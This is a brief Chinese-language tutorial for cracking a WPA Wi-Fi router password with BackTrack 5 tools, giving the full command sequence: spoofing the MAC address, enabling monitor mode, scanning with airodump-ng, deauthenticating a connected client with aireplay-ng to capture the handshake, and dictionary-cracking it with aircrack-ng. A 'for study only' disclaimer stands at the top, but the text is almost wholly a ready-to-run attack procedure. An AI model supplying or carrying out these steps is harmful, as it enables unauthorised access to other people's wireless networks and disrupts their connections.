Bracktrack5 破解路由（WPA ）

声明：本教程仅供学习用，不得用于任何非法活动，造成的一切后果本人概不负责！

步骤：

1. 修改自己的MAC地址

# ifconfig wlan0 down

# macchanger -m 00:11:22:33:44:55 wlan0

# ifconfig wlan0 up

2. 启动监听

# airmon-ng start wlan0

3.  修改mon0的MAC地址

# ifconfig mon0 down

# macchanger -m 00:11:22:33:44:55 mon0

# ifconfig mon0 up

4. 列出所有可扫描的网络列表

# airodump-ng mon0

5. 仔细找到有Station的那个网络，记下BSSID，再单独扫描该网络，并把结果写入crack_cap文件中（后面的抓握手包同样会保存在里面）

# airodump-ng -w crack_cap --bssid xx:xx:xx:xx:xx mon0

6. 开另一个Terminal抓握手包，将AP_BSSID改成上面找到的BSSID，将Station_BSSID改成上面对应的Station的BSSID

# aireplay-ng -0 -4 -a <AP_BSSID> -c <Station_BSSID> mon0

7. 在进行上一步时仔细观察第一个Terminal的上面有没有显示Handshake，如没有，重复第6步，直至出现该字样

8. 拿到握手包后就开始进行破解了，dict.txt是密码字典文件, crack_cap.cap是之前保存写入的文件，里面包括握手包

# aircrack-ng crack_cap.cap -w dict.txt

9. 现在就是等待时间了，如果没有找到密码，尝试找另一个密码字典文件，再重复第8步